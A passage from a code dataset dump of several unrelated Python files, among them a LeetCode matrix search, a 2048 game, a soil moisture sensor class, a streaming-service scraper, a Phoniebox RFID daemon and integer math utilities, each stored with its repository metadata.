[[1,3,5,7],[10,11,16,20],[23,30,34,60]], target = 13\n输出:false\n提示:\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 100\n-104 <= matrix[i][j], target <= 10^4\n\n来源:力扣(LeetCode)\n链接:https://leetcode-cn.com/problems/search-a-2d-matrix\n著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。\n\"\"\"\nfrom typing import List\nimport bisect\n\n\nclass Solution:\n def searchMatrix(self, matrix: List[List[int]], target: int) -> bool:\n if target < matrix[0][0] or target > matrix[-1][-1]:\n return False\n col0 = [matrix[i][0] for i in range(len(matrix))]\n if target in col0:\n return True\n row_index = bisect.bisect_left(col0, target)\n row_index -= 1\n\n col_index = bisect.bisect_left(matrix[row_index], target)\n if col_index == len(matrix[0]):\n return False\n if matrix[row_index][col_index] == target:\n return True\n return False\n\n\n# 负雪明烛\nclass Solution(object):\n def searchMatrix(self, matrix, target):\n \"\"\"\n 方法一:遍历\n 该方法就是遍历查找每个位置,看 target 是否出现。这个方法也能通过本题。\n \"\"\"\n M, N = len(matrix), len(matrix[0])\n for i in range(M):\n for j in range(N):\n if matrix[i][j] == target:\n return True\n return False\n\n def searchMatrix(self, matrix, target):\n return any(target in row for row in matrix)\n\n def searchMatrix(self, matrix, target):\n \"\"\"\n 方法二:从左下角或者右上角开始查找\n 这个方法是利用了矩阵的性质,如果我们从右上角开始遍历:\n 如果要搜索的 target 比当前元素大,那么让行增加;\n 如果要搜索的 target 比当前元素小,那么让列减小;\n \"\"\"\n if not matrix or not matrix[0]:\n return False\n rows = len(matrix)\n cols = len(matrix[0])\n row, col = 0, cols - 1\n while True:\n if row < rows and col >= 0:\n if matrix[row][col] == target:\n return True\n elif matrix[row][col] < target:\n row += 1\n else:\n col -= 1\n else:\n return False\n\n\nclass Solution(object):\n \"\"\"\n 方法四:两次二分查找\n 这个方法可以说是方法三的改进。在方法三种,我们是先遍历找到 target 在哪一行,然后在该行遍历或者二分查找的 target 。其实也可以先用二分找到 target 所在的行,然后在该行二分找到 target。\n\n 具体做法是,先找到 matrix[i][0] 小于 target 并且 matrix[i + 1][0] > target 的第 i 行,然后在该行内进行二分找到 target。\n\n 作者:fuxuemingzhu\n 链接:https://leetcode-cn.com/problems/search-a-2d-matrix/solution/fu-xue-ming-zhu-liu-chong-fang-fa-bang-n-e20z/\n 来源:力扣(LeetCode)\n 著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。\n \"\"\"\n\n def searchMatrix(self, matrix, target):\n M, N = len(matrix), len(matrix[0])\n col0 = [row[0] for row in matrix]\n target_row = bisect.bisect_right(col0, target) - 1\n if target_row < 0:\n return False\n target_col = bisect.bisect_left(matrix[target_row], target)\n if target_col >= N:\n return False\n if matrix[target_row][target_col] == target:\n return True\n return False\n\n\nif __name__ == '__main__':\n s = Solution()\n print(s.searchMatrix(matrix=[[1, 3, 5, 7], [10, 11, 16, 20], [23, 30, 34, 60]], target=66))\n","repo_name":"wanzhouyi/leetcode","sub_path":"1.数组和字符串/二分查找/74. 搜索二维矩阵.py","file_name":"74. 搜索二维矩阵.py","file_ext":"py","file_size_in_byte":4124,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"74696745174","text":"\r\nfrom PyQt5.QtWidgets import QMessageBox\r\n\r\nfrom moveBlock import MoveBlock\r\nimport random\r\n\r\nclass CMap:\r\n\r\n def __init__(self, parent):\r\n super().__init__()\r\n self.parent = parent\r\n self.N = self.parent.N\r\n self.score = 0\r\n\r\n self.MoveBlock = MoveBlock() \r\n\r\n def __del__(self): \r\n pass\r\n \r\n # 게임 초기화 함수\r\n def gameInit(self):\r\n self.map = [[0 for j in range(self.N)] for i in range(self.N)] # 맵 초기화\r\n self.score = 0 # 점수 초기화\r\n\r\n # 2블록 랜덤한 위치에 두개 생성\r\n row = random.sample(range(self.N), 2)\r\n col = random.sample(range(self.N), 2)\r\n self.map[row[0]][col[0]] = 2\r\n self.map[row[1]][col[1]] = 2\r\n \r\n # 게임 초기화 draw\r\n def displayGameinit(self):\r\n self.parent.writeScoreDB()\r\n self.gameInit()\r\n self.parent.scoreText.setText('SCORE\\n'+str(self.score))\r\n self.parent.blockUpdate(self.map)\r\n\r\n # 블록 생성 함수\r\n def generateBlock(self):\r\n # 맵이 0인 위치(row, col) 선택\r\n zeroIndex = [[row, col] for row in range(self.N) for col in range(self.N) if self.map[row][col] == 0]\r\n\r\n num = random.randrange(len(zeroIndex))\r\n row, col = zeroIndex[num][0], zeroIndex[num][1]\r\n \r\n # 90% 확률로 2카드 생성, 10% 확률로 4카드 생성\r\n if random.randrange(100)<90:\r\n self.map[row][col] = 2\r\n else:\r\n self.map[row][col] = 4\r\n \r\n # Map 바꾸기\r\n def changeMap(self, sKey):\r\n \r\n nextMap, nextScore = self.MoveBlock.nextMove(sKey, self.map)\r\n\r\n self.score += nextScore\r\n self.parent.scoreText.setText('SCORE\\n'+str(self.score))\r\n \r\n if self.score > self.parent.sizeScoredb[0]:\r\n self.parent.bestScore.setText('BEST\\n'+str(self.score))\r\n \r\n # key 누르기 전과 후가 다르면 새 카드 생성\r\n if not nextMap == self.map:\r\n self.map = nextMap\r\n self.generateBlock()\r\n self.parent.blockUpdate(self.map)\r\n\r\n if self.success():\r\n self.message(f'승리!\\nscore : {self.score}점\\n다시 시작하시겠습니까?')\r\n elif self.gameover():\r\n self.message(f'승리!\\nscore : {self.score}점\\n다시 시작하시겠습니까?')\r\n \r\n def message(self, text):\r\n result = QMessageBox.information(self.parent, 'finish', text, QMessageBox.Yes | QMessageBox.No)\r\n \r\n if result == QMessageBox.Yes:\r\n self.displayGameinit()\r\n else:\r\n self.parent.writeScoreDB()\r\n self.parent.close()\r\n\r\n def success(self):\r\n for r in range(self.N):\r\n for c in range(self.N):\r\n if self.map[r][c] == 2048:\r\n return True\r\n return False\r\n \r\n def gameover(self):\r\n \r\n for r in range(self.N):\r\n for c in range(self.N):\r\n if self.map[r][c] == 0:\r\n return False\r\n\r\n # 더 움직일 수 없으면 True\r\n for sKey in ['L','R','U','D']:\r\n nextMap = self.MoveBlock.nextMove(sKey, self.map)[0]\r\n if not nextMap == self.map:\r\n return False\r\n return True\r\n\r\n ","repo_name":"K-subin/2048Game","sub_path":"gameMap.py","file_name":"gameMap.py","file_ext":"py","file_size_in_byte":3334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"23189700830","text":"from PIL import Image\r\nimport os, glob\r\nimport numpy as np\r\n\r\n# ======================================이미지 데이터 읽어 들이기\r\ndir_train = 'C:/Study/lotte/data/train' \r\ndir_test = 'C:/Study/lotte/data/test' \r\nX = []\r\nY = []\r\nTEST = []\r\nnb_classes=1000\r\nimage_wh = 255\r\n\r\n#train data\r\nfor idx in range(1000):\r\n # 레이블 지정 \r\n label = [0 for i in range(nb_classes)]\r\n label[idx] = 1\r\n # 이미지 \r\n image_dir = f'{dir_train}/{idx}'\r\n files = glob.glob(image_dir +\"/*.jpg\")\r\n for i, f in enumerate(files): \r\n img = Image.open(f) \r\n img = img.convert(\"RGB\")\r\n img = img.resize((image_wh, image_wh))\r\n data = np.asarray(img) # numpy 배열로 변환\r\n X.append(data)\r\n Y.append(label)\r\nX = np.array(X)\r\nY = np.array(Y)\r\n\r\n#test data\r\nfiles = glob.glob(dir_test +\"/*.jpg\")\r\nfor i, f in enumerate(files): \r\n img = Image.open(f) \r\n img = img.convert(\"RGB\")\r\n img = img.resize((image_wh, image_wh))\r\n data = np.asarray(img) # numpy 배열로 변환\r\n TEST.append(data)\r\n\r\nTEST = np.array(TEST)\r\n\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_x.npy\", arr = X)\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_y.npy\", arr = Y)\r\nnp.save(\"C:/Study/lotte/data/npy/1_255_test.npy\", arr = TEST)\r\n\r\nprint(X.shape) #(48000, 128, 128, 3)\r\nprint(Y.shape) #(48000, 1000)\r\nprint(TEST.shape) #(72000, 128, 128, 3)","repo_name":"moileehyeji/Study","sub_path":"lotte/1_data_save.py","file_name":"1_data_save.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"26490559411","text":"\"\"\"\nModule to manage an analog soil moisture sensor.\nMoisture is a value between 0 and 100. 0 = air humidity; 100 = water humidity\n\nMax analog in = 3.3v!\n\nUsage example:\n\nsensor = SoilMoisture(2915, 1300, \"P13\")\nsensor.get_moisture()\n\"\"\"\n\n\nfrom machine import ADC\nimport time\n\nclass SoilMoisture:\n\n def __init__(self, air_voltage, water_voltage, p_analog_id):\n self.air_voltage = air_voltage\n self.water_voltage = water_voltage\n\n adc = ADC() # create an ADC object\n self.p_analog = adc.channel(pin=p_analog_id, attn=ADC.ATTN_11DB) # create an analog pin\n\n def get_raw_avg(self):\n measurements = []\n for i in range(0, 5):\n measurements.append(self.p_analog.voltage())\n time.sleep(0.2)\n return sum(measurements) / float(len(measurements))\n\n def get_moisture(self):\n voltage = self.get_raw_avg()\n diff = self.air_voltage - self.water_voltage\n a = voltage - self.water_voltage\n b = a / diff\n percent = int((b - 1) * -100)\n print(\"Moisture is {}%\".format(percent))\n return percent\n","repo_name":"MoeweX/micropython-lib","sub_path":"soil_moisture.py","file_name":"soil_moisture.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"67"} +{"seq_id":"27344182564","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\nimport json\r\nfrom urllib import parse as urlparse\r\nimport unicodedata\r\nimport re\r\nimport os\r\n\r\n_headers = ({'User-Agent':\r\n 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 '\r\n 'Safari/537.36',\r\n 'Accept-Language': 'en-US, en;q=0.5'})\r\n\r\n_google_search = 'https://google.com/search?'\r\n\r\n\r\ndef get_country():\r\n return json.loads(requests.get(\"http://ipinfo.io/json\").content.decode(\"utf-8\"))[\"country\"]\r\n\r\n\r\ndef get_services(movie, add=\" streaming\"):\r\n req = requests.get(_google_search + urlparse.urlencode({'q': movie + add}), headers=_headers)\r\n soup = BeautifulSoup(unicodedata.normalize(\"NFKD\", req.content.decode('utf-8')), 'html.parser')\r\n\r\n service_and = {}\r\n for service in soup.find_all('a', class_='JkUS4b'):\r\n name = service.find_all('div', class_='i3LlFf')[0].text\r\n try:\r\n price = service.find_all('span')[0].text\r\n except IndexError:\r\n price = None\r\n url = service.attrs['href']\r\n service_and[name] = (price, url)\r\n return service_and\r\n\r\n\r\ndef is_prime(url, fix_query=True):\r\n if fix_query:\r\n parsed = list(urlparse.urlparse(url))\r\n parsed[4] = ''\r\n url = urlparse.urlunparse(parsed)\r\n\r\n prime_site = requests.get(url, headers=_headers)\r\n prime_soup = BeautifulSoup(unicodedata.normalize(\"NFKD\", prime_site.content.decode(\"utf-8\"))\r\n .replace(\"\", \"\"), 'html.parser')\r\n\r\n logo = prime_soup.find_all('img', class_='_1GFTRr')\r\n if len(logo) > 0 and \"primeLogo\" in logo[0].attrs[\"src\"]:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\nif __name__ == '__main__':\r\n with open(\"movies.txt\", \"r\", encoding=\"utf-8\") as file:\r\n _movie_txt = file.read().splitlines(keepends=False)\r\n\r\n if os.path.exists(\"movies.json\"):\r\n with open(\"movies.json\", \"r\", encoding=\"utf-8\") as file:\r\n _movie_list = json.load(file)\r\n else:\r\n _movie_list = {}\r\n\r\n _country = get_country()\r\n\r\n for _movie in _movie_txt:\r\n _search_obj = re.search(r'\\\\/--(?P.+)--\\\\/', _movie)\r\n if _search_obj is not None:\r\n _movie_list[_search_obj.group(1)] = None # shitty implementation...not good practice\r\n elif _movie != '':\r\n print(_movie)\r\n _movie_services = get_services(_movie)\r\n _subscription = list(filter(lambda f: _movie_services[f][0] is None, _movie_services.keys()))\r\n\r\n if 'Amazon Prime Video' in _movie_services and 'Amazon Prime Video' not in _subscription:\r\n if is_prime(_movie_services['Amazon Prime Video'][1]):\r\n _subscription.append('Amazon Prime Video')\r\n\r\n if _movie not in _movie_list:\r\n _movie_list[_movie] = {}\r\n _movie_list[_movie][_country] = _subscription\r\n\r\n with open(\"movies.json\", \"w\", encoding=\"utf-8\") as file:\r\n json.dump(_movie_list, file, indent=\"\\t\", ensure_ascii=False)\r\n","repo_name":"TKFRvisionOfficial/streaming-service-searcher","sub_path":"search_for_service.py","file_name":"search_for_service.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41573486321","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\n#import threading\nimport sys, os.path\nimport signal\nfrom Phoniebox import Phoniebox\nfrom time import sleep,time\n\n# get absolute path of this script\ndir_path = os.path.dirname(os.path.realpath(__file__))\ndefaultconfigFilePath = os.path.join(dir_path,'phoniebox.conf')\n\n# watchdog blocks the script, so it cannot be used in the same file as the PhonieboxDaemon\n#from watchdog.observers import Observer\n#from watchdog.events import FileSystemEventHandler\n#from os.path import dirname\n\n#class FileModifiedHandler(FileSystemEventHandler):\n\n# \"\"\" watch the given file for changes and execute callback function on modification \"\"\"\n# def __init__(self, file_path, callback):\n# self.file_path = file_path\n# self.callback = callback\n\n# # set observer to watch for changes in the directory\n# self.observer = Observer()\n# self.observer.schedule(self, dirname(file_path), recursive=False)\n# self.observer.start()\n# try:\n# while True:\n# sleep(1)\n# except KeyboardInterrupt:\n# self.observer.stop()\n# self.observer.join()\n# \n# def on_modified(self, event): \n# # only act on the change that we're looking for\n# if not event.is_directory and event.src_path.endswith(self.file_path):\n# daemon.log(\"cardAssignmentsFile modified!\",3)\n# self.callback() # call callback\n\n\nclass PhonieboxDaemon(Phoniebox):\n \"\"\" This subclass of Phoniebox is to be called directly, running as RFID reader daemon \"\"\"\n\n def __init__(self,configFilePath=defaultconfigFilePath):\n Phoniebox.__init__(self,configFilePath)\n self.lastplayedID = 0\n\n def run(self):\n # do things if killed\n signal.signal(signal.SIGINT, self.signal_handler)\n signal.signal(signal.SIGTERM, self.signal_handler)\n\n # establish mpd connection\n self.mpd_init_connection()\n self.mpd_init_settings()\n state = self.client.status()[\"state\"]\n\n daemon.play_alsa(daemon.get_setting(\"phoniebox\",'startup_sound'))\n if state == \"play\":\n self.client.play()\n\n # launch watcher for config files, blocks the script\n # TODO: it would be better to watch the changes with a second process that\n # tells the PhonieboxDaemon to reload the config whenever needed.\n\n #card_assignments_file = daemon.get_setting(\"phoniebox\",\"card_assignments_file\")\n #cardAssignmentsWatchdog = FileModifiedHandler(card_assignments_file, self.update_cardAssignments)\n #ConfigWatchdog = FileModifiedHandler(configFilePath, self.read_config)\n\n# # start_reader runs an endless loop, nothing will be executed afterwards\n daemon.start_reader()\n\n def start_reader(self):\n from Reader import Reader\n reader = Reader()\n\n card_detection_sound = self.get_setting(\"phoniebox\",\"card_detection_sound\")\n debounce_time = self.get_setting(\"phoniebox\",\"debounce_time\")\n if debounce_time == -1:\n debounce_time = 0.5\n second_swipe_delay = self.get_setting(\"phoniebox\",\"second_swipe_delay\")\n if second_swipe_delay == -1:\n second_swipe_delay = 0\n store_card_assignments = self.get_setting(\"phoniebox\",\"store_card_assignments\")\n if store_card_assignments == -1:\n store_card_assignments = 30\n last_swipe = 0\n last_write_card_assignments = 0\n\n while True:\n # reading the card id\n cardid = reader.reader.readCard()\n# cardid = None\n# sleep(debounce_time)\n try:\n # start the player script and pass on the cardid\n if cardid != None:\n print(\"Card ID: {}\".format(int(cardid)))\n filename = self.get_setting(\"phoniebox\",\"Latest_RFID_file\")\n if filename != -1:\n self.print_to_file(filename,\"\\'{}\\' was used at {}\".format(cardid,time()))\n if card_detection_sound != -1:\n self.play_alsa(card_detection_sound)\n if cardid in self.cardAssignments.sections():\n # second swipe detection\n if int(cardid) == int(self.lastplayedID) and time()-last_swipe > second_swipe_delay:\n self.log(\"Second swipe for {}\".format(cardid),3)\n self.do_second_swipe()\n # if first swipe, just play\n else:\n last_swipe = time()\n self.do_start_playlist(cardid)\n # do not react for debounce_time\n sleep(debounce_time)\n else:\n self.log(\"Card with ID {} not mapped yet.\".format(cardid),1)\n\n except OSError as e:\n print(\"Execution failed:\")\n\n # check if it is time for the next update of the cardAssignments and do it\n # Note: this is purely time-based and not clever at all. Find a\n # TODO: find a better way to check for changes in the files on disk to trigger the update\n if time()-last_write_card_assignments > store_card_assignments and store_card_assignments != False:\n # store card assignments\n if self.get_setting(\"phoniebox\",\"translate_legacy_cardassignments\",\"bool\") == True:\n legacy_cardAssignments = self.translate_legacy_cardAssignments(last_write_card_assignments)\n self.update_cardAssignments(legacy_cardAssignments)\n else:\n self.update_cardAssignments(self.read_cardAssignments)\n\n self.write_new_cardAssignments()\n last_write_card_assignments = time()\n\n def signal_handler(self,signal,frame):\n \"\"\" catches signal and triggers the graceful exit \"\"\"\n print(\"Caught signal {}, exiting...\".format(signal))\n self.exit_gracefully()\n\n def exit_gracefully(self):\n \"\"\" stop mpd and write cardAssignments to disk if daemon is stopped \"\"\"\n self.mpd_connect_timeout()\n self.client.stop()\n self.client.disconnect()\n # write config to update playstate\n self.write_new_cardAssignments()\n\n # exit script\n sys.exit(0)\n\n\nif __name__ == \"__main__\":\n\n # if called directly, launch Phoniebox.py as rfid-reader daemon\n # treat the first argument as defaultconfigFilePath if given\n if len(sys.argv)<=1:\n configFilePath = defaultconfigFilePath\n else:\n configFilePath = sys.argv[1]\n\n daemon = PhonieboxDaemon(configFilePath)\n\n # setup the signal listeners\n signal.signal(signal.SIGINT, daemon.exit_gracefully)\n signal.signal(signal.SIGTERM, daemon.exit_gracefully)\n\n # start the daemon (blocking)\n daemon.run()\n\n","repo_name":"JoeyRamone/J4KTest","sub_path":"scripts/python-phoniebox/PhonieboxDaemon.py","file_name":"PhonieboxDaemon.py","file_ext":"py","file_size_in_byte":6984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"29547034246","text":"\"\"\"Calculate nucleotide frequencies in alignments.\"\"\"\n\nimport os\nimport re\n\nimport matplotlib.pyplot as plt\nfrom src.utils import read_fasta\n\n\ndef grouped_bar(groups, group_width, bar_width, file_label, bar_labels=None, bar_colors=None):\n group_labels = sorted(groups)\n if bar_labels is None:\n bar_labels = list({bar_label for group in groups.values() for bar_label in group})\n if bar_colors is None:\n bar_colors = [f'C{i%10}' for i in range(len(bar_labels))]\n\n xs = [i * group_width for i in range(len(groups))]\n lim = len(bar_labels) // 2\n shift = 0 if len(bar_labels) % 2 == 1 else 0.5\n dxs = [bar_width * (x + shift) for x in range(-lim, len(bar_labels) - lim)]\n\n plt.figure(figsize=(8, 4))\n for dx, bar_label, bar_color in zip(dxs, bar_labels, bar_colors):\n plt.bar([x + dx for x in xs], [groups[group_label].get(bar_label, 0) for group_label in group_labels],\n width=bar_width, color=bar_color, label=bar_label)\n plt.xticks(xs, group_labels, rotation=60, fontsize='small')\n plt.xlabel('Species')\n plt.ylabel('Frequency')\n plt.legend(loc='center left', bbox_to_anchor=(1, 0.5), prop={'size': 'small'})\n plt.subplots_adjust(bottom=0.2, left=0.1, right=0.9)\n plt.savefig(f'out/{file_label}.png')\n plt.close()\n\n\nspid_regex = r'spid=([a-z]+)'\n\n# Count nucleotides\ncounts = {}\nfor path in [path for path in os.listdir('../align_AA2NT/out/') if path.endswith('.afa')]:\n msa = read_fasta(f'../align_AA2NT/out/{path}')\n for header, seq in msa:\n spid = re.search(spid_regex, header).group(1)\n for sym in seq:\n if sym != '-':\n try:\n counts[spid][sym] = counts[spid].get(sym, 0) + 1\n except KeyError:\n counts[spid] = {sym: 1}\n\nif not os.path.exists('out/'):\n os.mkdir('out/')\n\n# Plot nucleotide frequencies\nfreqs = {}\nfor spid, count in counts.items():\n total = sum(count.values())\n freqs[spid] = {sym: num / total for sym, num in count.items()}\n\ngrouped_bar(freqs, 1.5, 0.25, 'nt_freqs', ['A', 'T', 'G', 'C'], ['C0', 'C1', 'C3', 'C2'])\n\n# Plot AT/GC frequencies\nATGCs = {}\nfor spid, freq in freqs.items():\n ATGCs[spid] = {'AT': freq['A'] + freq['T'], 'GC': freq['G'] + freq['C']}\n\ngrouped_bar(ATGCs, 1, 0.3, 'ATGC_freqs', ['AT', 'GC'])\n\n\"\"\"\nDEPENDENCIES\n../align_AA2NT/align_AA2NT.py\n ../align_AA2NT/out/*.afa\n\"\"\"","repo_name":"marcsingleton/orthology_inference2023","sub_path":"analysis/ortho_tree/NT_freqs/NT_freqs.py","file_name":"NT_freqs.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"67"} +{"seq_id":"12856808273","text":"def IsEven(inter):\n\tif inter %2==0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef Divides(n, k):\n\tif n %k == 0:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef Product(Array):\n\tProd = 1\n\tfor n in Array:\n\t\tProd = Prod *n\n\treturn Prod\n\n\ndef HasFactor(n, factorList):\n\tfor k in factorList:\n\t\tif n % k == 0:\n\t\t\treturn True\n\treturn False\n\n\ndef nCr(n, r):\n\tif n<=r:\n\t\treturn 1\n\telse:\n\t\ttop = 1\n\t\tbot = 1\n\t\tr = min(r, n -r)\n\t\tfor i in range(n -r):\n\t\t\ttop = top *(n -i)\n\t\t\tbot = bot *(n -r -i)\n\treturn int(top /bot)\n\n\ndef MakePrimes(Maximum, primes=[2]):\n\tif Maximum<=2:\n\t\treturn [2]\n\n\tfrom math import ceil\n\n\tdef PrimeFactor(n, PrimesList):\n\t\tHalfWay = ceil(n**.5)\n\t\tfor k in PrimesList:\n\t\t\tif k > HalfWay:\n\t\t\t\treturn False\n\t\t\tif n % k == 0:\n\t\t\t\treturn True\n\t\treturn False\n\n\tfor i in range(max(primes) +1, Maximum +1):\n\t\tif PrimeFactor(i, primes):\n\t\t\tcontinue\n\t\telse:\n\t\t\tprimes.append(i)\n\treturn primes\n\tpass\n\n\ndef DigitCount(Integer):\n\treturn len(str(Integer))\n\n\ndef IsPalindrome(Integer):\n\tSTR = str(Integer)\n\tfor i in range(len(STR)):\n\t\tif STR[i] != STR[len(STR) -1 -i]:\n\t\t\treturn False\n\treturn True\n\n\ndef ModMult(a, b, M):\n\tA = a %M\n\tB = b %M\n\treturn ((A *B) %M)\n\tpass\n\n\ndef Obvs(Integer, ind=0):\n\tSTR=set(str(Integer)[ind:])\n\tif set.intersection(set([\"2\", \"4\", \"5\", \"6\", \"8\", \"0\"]), STR)!=set([]):\n\t\treturn True\n\n\ndef Factorial(Integer):\n\tResult = 1\n\tfor k in range(1, Integer +1):\n\t\tResult = Result * k\n\treturn Result\n\n\ndef Triangular(Integer):\n\treturn int(Integer *(Integer +1) /2)\n\n\ndef Pyramidal(Integer):\n\treturn int(Integer *(Integer +1) *(2 *Integer +1) /6)\n\n\ndef Pentagonal(Integer):\n\treturn int(Integer *(3 *Integer -1) /2)\n\n\ndef Hexagonal(Integer):\n\treturn int(Integer *(2 *Integer -1))\n\n\ndef isSquare(Integer):\n\treturn (abs(Integer)**.5 %1==0)\n\n\ndef isTriangular(Integer):\n\treturn isSquare(8 *Integer +1)\n\n\ndef isPentagonal(Integer):\n\tif not isSquare(24 *Integer + 1):\n\t\treturn False\n\telif ((int((24 *Integer +1)**.5) +1) %6!=0):\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef isHexagonal(Integer):\n\tif not isSquare(8 *Integer +1):\n\t\treturn False\n\telif (int((8 *Integer +1)**.5) +1) %4!=0:\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef IsPythagorean(a, b, c):\n\treturn a**2 +b**2 == c**2\n\n\ndef PySumTo(Integer):\n\tfrom math import floor\n\ta=1\n\tb=1\n\tc=Integer -2\n\tTriples = []\n\tMinimum = int(floor(Integer /3))\n\twhile c > Minimum:\n\t\tif IsPythagorean(a, b, c):\n\t\t\tTriples.append([a, b, c])\n\t\tc = c -1\n\t\tb = b +1\n\t\tif b>=c:\n\t\t\tb=a +1\n\t\t\ta=a +1\n\t\t\tc=Integer -a -b\n\treturn(Triples)\n\n\ndef FactorsOf(Integer):\n\tFactors = []\n\tMaximum = Integer**.5\n\ti = 1\n\twhile True:\n\t\tif i > Maximum:\n\t\t\tbreak\n\t\tif Integer % i==0:\n\t\t\tFactors.append(i)\n\t\t\tif i != int(Integer / i):\n\t\t\t\tFactors.append(int(Integer / i))\n\t\ti = i +1\n\treturn sorted(Factors)\n\n\ndef SmallestCommonFactor(a, b):\n\tdef FactorsOf(Integer):\n\t\tFactors = []\n\t\tMaximum = Integer**.5\n\t\ti = 1\n\t\twhile True:\n\t\t\tif i > Maximum:\n\t\t\t\tbreak\n\t\t\tif Integer % i==0:\n\t\t\t\tFactors.append(i)\n\t\t\t\tif i != int(Integer / i):\n\t\t\t\t\tFactors.append(int(Integer / i))\n\t\t\ti = i +1\n\t\treturn sorted(Factors)\n\n\tFactors = FactorsOf(abs(min(a, b)))[1:]\n\tMax = abs(max(a, b))\n\t# ignore the fact that 1 divides a,b\n\tfor k in Factors[1:]:\n\t\tif Max % k == 0:\n\t\t\treturn k\n\treturn False\n\n\ndef HighestCommonFactor(a, b):\n\tdef FactorsOf(Integer):\n\t\tif Integer ==1:\n\t\t\treturn [1]\n\t\tFactors = []\n\t\tMaximum = Integer**.5\n\t\ti = 1\n\t\twhile True:\n\t\t\tif i > Maximum:\n\t\t\t\tbreak\n\t\t\tif Integer % i==0:\n\t\t\t\tFactors.append(i)\n\t\t\t\tif i != int(Integer / i):\n\t\t\t\t\tFactors.append(int(Integer / i))\n\t\t\ti = i +1\n\t\treturn sorted(Factors)\n\tFactors = reversed(FactorsOf(abs(min(a, b))))\n\tMax = abs(max(a, b))\n\t# not excluding 1, as this is always a possible factor\n\tfor k in Factors:\n\t\tif Max % k == 0:\n\t\t\treturn k\n\treturn False\n\n\ndef BiggestCoin(Value, Coins=[200, 100, 50, 20, 10, 5, 2, 1]):\n\tHead = Coins[0]\n\tTail = Coins[1:]\n\tSum = 0\n\tLoopCount = Value //Head\n\tif Tail !=[]:\n\t\tfor t in range(0, LoopCount +1):\n\t\t\tSum = Sum + BiggestCoin(Value - (t *Head), Tail)\n\t\treturn Sum\n\treturn int(Value % Head==0)\n\n\ndef PairSum(RowSum, MaxInd=False, Reversed=False):\n\tif not MaxInd:\n\t\tMaxInd = [RowSum +1, RowSum +1]\n\tfor k in range(0, RowSum +1):\n\t\ty = RowSum -k\n\t\tx = k\n\t\tif (x >= MaxInd[0]) or (y >= MaxInd[1]):\n\t\t\tcontinue\n\t\tyield (y, x)\n\n\n\ndef PanCheck(n, q=9):\n\tSTR = str(n)\n\tif len(STR)!=q:\n\t\treturn False\n\tDigits = set(STR)\n\tif len(Digits)!=q:\n\t\treturn False\n\tif Digits!=set([str(i) for i in range(1, q +1)]):\n\t\treturn False\n\telse:\n\t\treturn True\n\n\ndef IntReverse(Integer):\n\tfrom functions.Integer import IntReverse\n\treturn intStrAdd(reversed(str(Integer)))\n\tpass\n\n\ndef intStrAdd(Array):\n\tSTR = \"\"\n\tfor n in Array:\n\t\tSTR = STR +str(n)\n\treturn int(STR)\n\n\ndef isPrime(n, primes=[2]):\n\tfrom functions.Integer import MakePrimes\n\tfrom functions.Integer import HasFactor\n\tfrom math import ceil\n\n\tif n<=1:\n\t\treturn False, primes\n\n\tif n in primes:\n\t\treturn True, primes\n\telif n < max(primes):\n\t\treturn False, primes\n\telif HasFactor(n, primes):\n\t\treturn False, primes\n\telse:\n\t\tprimes = MakePrimes(ceil(n**.5), primes)\n\t\tif HasFactor(n, primes):\n\t\t\treturn False, primes\n\t\telse:\n\t\t\treturn True, primes\n\n\ndef CollatzSequence(Integer):\n\tdef ColatzStep(Integer):\n\t\tif Integer % 2==0:\n\t\t\treturn Integer /2\n\t\telse:\n\t\t\treturn 3 * Integer +1\n\tSequence = [Integer]\n\twhile True:\n\t\tif Integer <=1:\n\t\t\tbreak\n\t\telse:\n\t\t\tInteger = ColatzStep(Integer)\n\t\t\tSequence.append(int(Integer))\n\treturn Sequence\n\n\ndef CheckedCollatzSequence(Integer, Checked={1: 1}):\n\n\n\tdef ColatzStep(Integer):\n\t\tif Integer % 2 == 0:\n\t\t\treturn int(Integer /2)\n\t\telse:\n\t\t\treturn 3 * Integer +1\n\n\n\tdef CollatzAddSeq(seq, Checked):\n\t\tCurrentValue = 1\n\t\tfor n in reversed(seq):\n\t\t\tif n in Checked:\n\t\t\t\tif type(Checked[n]) is int:\n\t\t\t\t\tCurrentValue = Checked[n]\n\t\t\t\telse:\n\t\t\t\t\tChecked[n] = CurrentValue\n\t\t\telse:\n\t\t\t\tChecked[n] = CurrentValue\n\t\t\tCurrentValue = CurrentValue +1\n\t\tpass\n\n\tSequence = [Integer]\n\twhile True:\n\t\tif Integer <=1:\n\t\t\tbreak\n\t\telse:\n\t\t\tif Integer in Checked.keys():\n\t\t\t\tbreak\n\t\t\telse:\n\t\t\t\tChecked[Integer] = True\n\t\t\tInteger = ColatzStep(Integer)\n\t\t\tSequence.append(int(Integer))\n\tCollatzAddSeq(seq=Sequence, Checked=Checked)\n\treturn Checked\n\n\ndef GetAmicable(Integer):\n\treturn sum(FactorsOf(Integer)) -Integer\n\n\ndef IsAmicable(Integer):\n\tFlip = sum(FactorsOf(Integer)) -Integer\n\tFlop = sum(FactorsOf(Flip)) -Flip\n\treturn (Flop == Integer and Flip != 